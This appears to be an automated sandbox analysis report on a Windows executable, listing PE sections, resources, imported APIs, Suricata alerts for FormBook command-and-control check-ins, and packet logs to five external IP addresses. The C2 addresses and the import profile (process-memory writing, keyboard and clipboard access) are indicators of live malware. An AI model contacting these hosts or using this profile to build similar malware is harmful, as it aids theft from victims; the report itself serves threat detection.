.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x62a38	0x62c00	ca8088d853d25d714e18042a796d576b	False	0.9329979232594937	data	7.905946897196692	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x12a000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x59cff	data			1.0003289196484637
RT_GROUP_ICON	0x1294b8	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x129530	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x129544	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x129558	0x14	data	English	Great Britain	1.25
RT_VERSION	0x12956c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x129648	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T02:53:41.780016+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.10	49971	162.0.215.91	80	TCP
2025-01-11T02:54:05.302271+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.10	49975	194.58.112.174	80	TCP
2025-01-11T02:54:18.704444+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.10	49979	199.192.23.123	80	TCP
2025-01-11T02:54:32.005451+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.10	49983	66.29.146.78	80	TCP
2025-01-11T02:54:45.193298+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.10	49987	84.32.84.32	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 02:53:41.185281992 CET	49971	80	192.168.2.10	162.0.215.91
Jan 11, 2025 02:53:41.190241098 CET	80	49971	162.0.215.91	192.168.2.10
Jan 11, 2025 02:53:41.190382004 CET	49971	80	192.168.2.10	162.0.215.91
Jan 11, 2025 02:53:41.200656891 CET	49971	80	192.168.2.10	162.0.215.91
Jan 11, 2025 02:53:41.205641985 CET	80	49971	162.0.215.91	192.168.2.10
Jan 11, 2025 02:53:41.779856920 CET	80	49971	162.0.215.91	192.168.2.10
Jan 11, 2025 02:53:41.779872894 CET	80	49971	162.0.215.91	192.168.2.10
Jan 11, 2025 02:53:41.779884100 CET	80	49971	162.0.215.91	192.168.2.10
Jan 11, 2025 02:53:41.779895067 CET	80	49971	162.0.215.91	192.168.2.10
Jan 11, 2025 02:53:41.779905081 CET	80	49971	162.0.215.91	192.168.2.10
Jan 11, 2025 02:53:41.779916048 CET	80	49971	162.0.215.91	192.168.2.10
Jan 11, 2025 02:53:41.779927015 CET	80	49971	162.0.215.91	192.168.2.10
Jan 11, 2025 02:53:41.779939890 CET	80	49971	162.0.215.91	192.168.2.10
Jan 11, 2025 02:53:41.780015945 CET	49971	80	192.168.2.10	162.0.215.91
Jan 11, 2025 02:53:41.780056953 CET	49971	80	192.168.2.10	162.0.215.91
Jan 11, 2025 02:53:41.780478954 CET	80	49971	162.0.215.91	192.168.2.10
Jan 11, 2025 02:53:41.780498028 CET	80	49971	162.0.215.91	192.168.2.10
Jan 11, 2025 02:53:41.780538082 CET	49971	80	192.168.2.10	162.0.215.91
Jan 11, 2025 02:53:41.780627012 CET	80	49971	162.0.215.91	192.168.2.10
Jan 11, 2025 02:53:41.780667067 CET	49971	80	192.168.2.10	162.0.215.91
Jan 11, 2025 02:53:41.785581112 CET	49971	80	192.168.2.10	162.0.215.91
Jan 11, 2025 02:53:41.793304920 CET	80	49971	162.0.215.91	192.168.2.10
Jan 11, 2025 02:53:56.951029062 CET	49972	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:53:56.955847025 CET	80	49972	194.58.112.174	192.168.2.10
Jan 11, 2025 02:53:56.955928087 CET	49972	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:53:56.971138954 CET	49972	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:53:56.976062059 CET	80	49972	194.58.112.174	192.168.2.10
Jan 11, 2025 02:53:57.649286985 CET	80	49972	194.58.112.174	192.168.2.10
Jan 11, 2025 02:53:57.649465084 CET	80	49972	194.58.112.174	192.168.2.10
Jan 11, 2025 02:53:57.649555922 CET	49972	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:53:58.482671976 CET	49972	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:53:59.501442909 CET	49973	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:53:59.506340027 CET	80	49973	194.58.112.174	192.168.2.10
Jan 11, 2025 02:53:59.506453037 CET	49973	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:53:59.520834923 CET	49973	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:53:59.525667906 CET	80	49973	194.58.112.174	192.168.2.10
Jan 11, 2025 02:54:00.195969105 CET	80	49973	194.58.112.174	192.168.2.10
Jan 11, 2025 02:54:00.195998907 CET	80	49973	194.58.112.174	192.168.2.10
Jan 11, 2025 02:54:00.196094036 CET	49973	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:54:01.029802084 CET	49973	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:54:02.048032045 CET	49974	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:54:02.053073883 CET	80	49974	194.58.112.174	192.168.2.10
Jan 11, 2025 02:54:02.053143978 CET	49974	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:54:02.068490982 CET	49974	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:54:02.073493958 CET	80	49974	194.58.112.174	192.168.2.10
Jan 11, 2025 02:54:02.073559046 CET	80	49974	194.58.112.174	192.168.2.10
Jan 11, 2025 02:54:02.756947994 CET	80	49974	194.58.112.174	192.168.2.10
Jan 11, 2025 02:54:02.757038116 CET	80	49974	194.58.112.174	192.168.2.10
Jan 11, 2025 02:54:02.757108927 CET	49974	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:54:03.588948011 CET	49974	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:54:04.595427990 CET	49975	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:54:04.603888035 CET	80	49975	194.58.112.174	192.168.2.10
Jan 11, 2025 02:54:04.603971004 CET	49975	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:54:04.613801956 CET	49975	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:54:04.622392893 CET	80	49975	194.58.112.174	192.168.2.10
Jan 11, 2025 02:54:05.302099943 CET	80	49975	194.58.112.174	192.168.2.10
Jan 11, 2025 02:54:05.302160978 CET	80	49975	194.58.112.174	192.168.2.10
Jan 11, 2025 02:54:05.302270889 CET	49975	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:54:05.304922104 CET	49975	80	192.168.2.10	194.58.112.174
Jan 11, 2025 02:54:05.311203003 CET	80	49975	194.58.112.174	192.168.2.10
Jan 11, 2025 02:54:10.329018116 CET	49976	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:10.333878040 CET	80	49976	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:10.334007978 CET	49976	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:10.352336884 CET	49976	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:10.357398033 CET	80	49976	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:10.942410946 CET	80	49976	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:10.942461014 CET	80	49976	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:10.942507982 CET	49976	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:11.858239889 CET	49976	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:12.876884937 CET	49977	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:12.881906033 CET	80	49977	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:12.881997108 CET	49977	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:12.898633957 CET	49977	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:12.903455973 CET	80	49977	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:13.473365068 CET	80	49977	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:13.473556042 CET	80	49977	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:13.473666906 CET	49977	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:14.404647112 CET	49977	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:15.480308056 CET	49978	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:15.487270117 CET	80	49978	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:15.487365007 CET	49978	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:15.537826061 CET	49978	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:15.544555902 CET	80	49978	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:15.546734095 CET	80	49978	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:16.082485914 CET	80	49978	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:16.082597971 CET	80	49978	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:16.082653046 CET	49978	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:17.045325994 CET	49978	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:18.068299055 CET	49979	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:18.074465036 CET	80	49979	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:18.074548006 CET	49979	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:18.151704073 CET	49979	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:18.156692028 CET	80	49979	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:18.703166008 CET	80	49979	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:18.704267979 CET	80	49979	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:18.704443932 CET	49979	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:18.714741945 CET	49979	80	192.168.2.10	199.192.23.123
Jan 11, 2025 02:54:18.721750021 CET	80	49979	199.192.23.123	192.168.2.10
Jan 11, 2025 02:54:23.746654987 CET	49980	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:23.751688957 CET	80	49980	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:23.751790047 CET	49980	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:23.766625881 CET	49980	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:23.771487951 CET	80	49980	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:24.351911068 CET	80	49980	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:24.351939917 CET	80	49980	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:24.351958036 CET	80	49980	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:24.352029085 CET	49980	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:24.352143049 CET	80	49980	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:24.352159977 CET	80	49980	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:24.352185011 CET	49980	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:24.352207899 CET	80	49980	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:24.352256060 CET	49980	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:25.279793024 CET	49980	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:26.298382998 CET	49981	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:26.303303957 CET	80	49981	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:26.303529024 CET	49981	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:26.318356991 CET	49981	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:26.323199034 CET	80	49981	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:26.896034956 CET	80	49981	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:26.896056890 CET	80	49981	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:26.896066904 CET	80	49981	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:26.896079063 CET	80	49981	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:26.896090031 CET	80	49981	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:26.896100998 CET	49981	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:26.896104097 CET	80	49981	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:26.896159887 CET	49981	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:27.826668024 CET	49981	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:28.845247984 CET	49982	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:28.853023052 CET	80	49982	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:28.853159904 CET	49982	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:28.867861986 CET	49982	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:28.876563072 CET	80	49982	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:28.878886938 CET	80	49982	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:29.465712070 CET	80	49982	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:29.465744019 CET	80	49982	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:29.465749979 CET	80	49982	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:29.465754032 CET	80	49982	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:29.465756893 CET	80	49982	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:29.465770006 CET	80	49982	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:29.465869904 CET	49982	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:29.465976954 CET	49982	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:30.375345945 CET	49982	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:31.392568111 CET	49983	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:31.397476912 CET	80	49983	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:31.397552967 CET	49983	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:31.406265020 CET	49983	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:31.411088943 CET	80	49983	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:32.005224943 CET	80	49983	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:32.005242109 CET	80	49983	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:32.005254030 CET	80	49983	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:32.005268097 CET	80	49983	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:32.005279064 CET	80	49983	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:32.005290985 CET	80	49983	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:32.005309105 CET	80	49983	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:32.005326033 CET	80	49983	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:32.005341053 CET	80	49983	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:32.005352974 CET	80	49983	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:32.005362988 CET	80	49983	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:32.005450964 CET	49983	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:32.005497932 CET	49983	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:32.010356903 CET	49983	80	192.168.2.10	66.29.146.78
Jan 11, 2025 02:54:32.017064095 CET	80	49983	66.29.146.78	192.168.2.10
Jan 11, 2025 02:54:37.074425936 CET	49984	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:37.079328060 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:37.079483032 CET	49984	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:37.099807978 CET	49984	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:37.104697943 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:37.564090014 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:37.564325094 CET	49984	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:38.607918978 CET	49984	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:38.616767883 CET	80	49984	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:39.626687050 CET	49985	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:39.631628990 CET	80	49985	84.32.84.32	192.168.2.10
Jan 11, 2025 02:54:39.631913900 CET	49985	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:39.646497965 CET	49985	80	192.168.2.10	84.32.84.32
Jan 11, 2025 02:54:39.651392937 CET	80	49985	84.32.84.32	192.168.2.10
